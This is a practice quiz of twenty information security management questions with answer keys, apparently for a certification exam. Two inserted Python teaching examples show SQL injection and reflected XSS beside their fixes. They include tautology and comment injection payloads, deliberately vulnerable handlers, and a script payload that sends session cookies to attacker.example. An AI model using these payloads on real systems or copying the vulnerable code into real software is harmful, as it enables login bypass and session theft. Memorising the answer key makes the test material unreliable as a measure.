Question #1
A common concern with poorly written web applications is that they can allow an attacker to:
A. gain control through a buffer overflow
B. conduct a distributed denial of service (DoS) attack
C. abuse a race condition
D. inject structured query language (SQL) statements
Correct answer: D
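The point behind question 1 is easier to see in code. The following is an added example, not part of the quiz page: a login check that splices request parameters into a SQL string, beside the same check with bound parameters. The in-memory SQLite table, the credentials and the attacker payloads are all constructed for the demonstration.

```python
"""Added example (not from the quiz page): SQL injection in a web login handler
and the parameterized-query fix. Standard library only; the users table,
credentials and payloads below are constructed sample data."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory database with a single constructed user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Deliberately vulnerable: request strings become part of the SQL text."""
    sql = (f"SELECT role FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: placeholders make the driver bind values, so input is data, never SQL."""
    sql = "SELECT role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run both handlers against valid credentials and two classic payloads."""
    conn = build_db()
    tautology = "' OR '1'='1"     # turns the WHERE clause into ... OR '1'='1'
    comment = "alice' --"         # comments out the password check entirely
    return {
        "vuln_valid": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_tautology": login_vulnerable(conn, "alice", tautology),  # bypass
        "vuln_comment": login_vulnerable(conn, comment, "wrong"),      # bypass
        "safe_valid": login_safe(conn, "alice", "s3cret"),
        "safe_tautology": login_safe(conn, "alice", tautology),        # rejected
        "safe_comment": login_safe(conn, comment, "wrong"),            # rejected
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Both payloads succeed against `login_vulnerable` because SQLite parses the attacker's quote and `--` as syntax; against `login_safe` the same strings are compared as literal column values and no row matches.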
Question #2
A global financial institution has decided not to take any further action on a denial of service (DoS) risk found by the risk assessment team. The MOST likely reason they made this decision is that:
A. there are sufficient safeguards in place to prevent this risk from happening
B. the needed countermeasure is too complicated to deploy
C. the cost of the countermeasure outweighs the value of the asset and the potential loss
D. the likelihood of the risk occurring is unknown
Correct answer: C
Question #3
Which of the following is MOST important for a successful information security program?
A. Adequate training on emerging security technologies
B. Open communication with key process owners
C. Adequate policies, standards and procedures
D. Executive management commitment
Correct answer: D
Question #4
After completing a full IT risk assessment, who can BEST decide which mitigating controls should be implemented?
A. Senior management
B. Business manager
C. IT audit manager
D. Information security officer (ISO)
Correct answer: B
Question #5
When performing a risk assessment, the MOST important consideration is that:
A. management supports risk mitigation efforts
B. annual loss expectancies (ALEs) have been calculated for critical assets
C. assets have been identified and appropriately valued
D. attack motives, means and opportunities are understood
Correct answer: C
Question #6
An internal audit has identified major weaknesses over IT processing. Which of the following should an information security manager use to BEST convey a sense of urgency to management?
A. Security metrics reports
B. Risk assessment reports
C. Business impact analysis (BIA)
D. Return on security investment report
Correct answer: B
Question #7
Attackers who exploit cross-site scripting vulnerabilities take advantage of:
A. a lack of proper input validation controls
B. weak authentication controls in the web application layer
C. flawed cryptographic secure sockets layer (SSL) implementations and short key lengths
D. implicit web application trust relationships
Correct answer: A
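To make question 7 concrete, here is an added example that is not part of the quiz page: a handler that reflects a query parameter into HTML without validation or encoding, beside the same handler with an allow-list check on the input and HTML escaping on the output. A small parser counts the elements a browser would create from each response, which is how you can see the injected `<script>` element appear. The template, the payload and the `attacker.example` host are constructed for the demonstration.

```python
"""Added example (not from the quiz page): reflected cross-site scripting and
the two controls that stop it, input validation and output encoding.
Standard library only; the template, payload and host name are constructed."""
import html
import re
from html.parser import HTMLParser

# Allow-list for a display name: letters, spaces, apostrophes and hyphens only.
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z' -]{0,63}$")


def is_valid_name(name: str) -> bool:
    """Input validation: reject anything outside the expected character set."""
    return NAME_RE.fullmatch(name) is not None


def render_vulnerable(name: str) -> str:
    """Deliberately vulnerable: untrusted input concatenated into the HTML body."""
    return f"<p>Hello, {name}!</p>"


def render_safe(name: str) -> str:
    """Hardened: validate, then encode for the HTML text context before output."""
    if not is_valid_name(name):
        name = "guest"  # fall back rather than echo rejected input
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


class ElementCounter(HTMLParser):
    """Collects start tags, i.e. the elements a browser would build from the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def script_elements(markup: str) -> int:
    """Number of <script> elements the response would create."""
    parser = ElementCounter()
    parser.feed(markup)
    return parser.tags.count("script")


def demo() -> dict:
    # Constructed payload: exfiltrates the session cookie to an attacker-controlled host.
    payload = ('<script>document.location="https://attacker.example/?c="'
               '+document.cookie</script>')
    return {
        "payload_valid": is_valid_name(payload),                       # False
        "vuln_scripts": script_elements(render_vulnerable(payload)),   # 1
        "safe_scripts": script_elements(render_safe(payload)),         # 0
        "safe_markup": render_safe(payload),
        "normal_markup": render_safe("Alice O'Neil"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Validation alone is not enough in general (a legitimate value such as `O'Neil` still has to be encoded for the context it lands in), so the hardened handler applies both; the parser count shows the vulnerable response carries one script element and the hardened one none.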
Question #8
The organization has decided to outsource the majority of the IT department to a vendor that is hosting servers in a foreign country. Of the following, which is the MOST critical security consideration?
A. Laws and regulations of the country of origin may not be enforceable in the foreign country
B. A security breach notification might get delayed due to the time difference
C. Additional network intrusion detection sensors should be installed, resulting in additional cost
D. The company could lose physical control over the servers and be unable to monitor their physical security posture
Correct answer: A
Question #9
When implementing effective security governance within the requirements of the company's security strategy, which of the following is the MOST important factor to consider?
A. Preserving the confidentiality of sensitive data
B. Establishing international security standards for data sharing
C. Adhering to corporate privacy standards
D. Establishing system manager responsibility for information security
Correct answer: A
Question #10
Which of the following is the MOST important prerequisite for establishing information security management within an organization?
A. Senior management commitment
B. Information security framework
C. Information security organizational structure
D. Information security policy
Correct answer: A
Question #11
One way to determine control effectiveness is by determining:
A. whether it is preventive, detective or compensatory
B. its capability of providing notification of failure
C. the test results against its intended objectives
D. the evaluation and analysis of its reliability
Correct answer: C
Question #12
The MOST complete business case for security solutions is one that:
A. includes appropriate justification
B. explains the current risk profile
C. details regulatory requirements
D. identifies incidents and losses
Correct answer: A
Question #13
When a user employs a client-side digital certificate to authenticate to a web server through Secure Sockets Layer (SSL), confidentiality is MOST vulnerable to which of the following?
A. IP spoofing
B. Man-in-the-middle attack
C. Repudiation
D. Trojan
Correct answer: D
Question #14
Who in an organization has the responsibility for classifying information?
A. Data custodian
B. Database administrator
C. Information security officer
D. Data owner
Correct answer: D
Question #15
When performing an information risk analysis, an information security manager should FIRST:
A. establish the ownership of assets
B. evaluate the risks to the assets
C. take an asset inventory
D. categorize the assets
Correct answer: C
Question #16
The FIRST step to create an internal culture that focuses on information security is to:
A. implement stronger controls
B. conduct periodic awareness training
C. actively monitor operations
D. gain the endorsement of executive management
Correct answer: D
Question #17
Which of the following would be of GREATEST importance to the security manager in determining whether to accept residual risk?
A. Historical cost of the asset
B. Acceptable level of potential business impacts
C. Cost versus benefit of additional mitigating controls
D. Annualized loss expectancy (ALE)
Correct answer: B
Question #18
Investments in information security technologies should be based on:
A. vulnerability assessments
B. value analysis
C. business climate
D. audit recommendations
Correct answer: B
Question #19
The decision as to whether a risk has been reduced to an acceptable level should be determined by:
A. organizational requirements
B. information systems requirements
C. information security requirements
D. international standards
Correct answer: A
Question #20
When an organization is setting up a relationship with a third-party IT service provider, which of the following is one of the MOST important topics to include in the contract from a security standpoint?
A. Compliance with international security standards
B. Use of a two-factor authentication system
C. Existence of an alternate hot site in case of business disruption
D. Compliance with the organization's information security requirements
Correct answer: D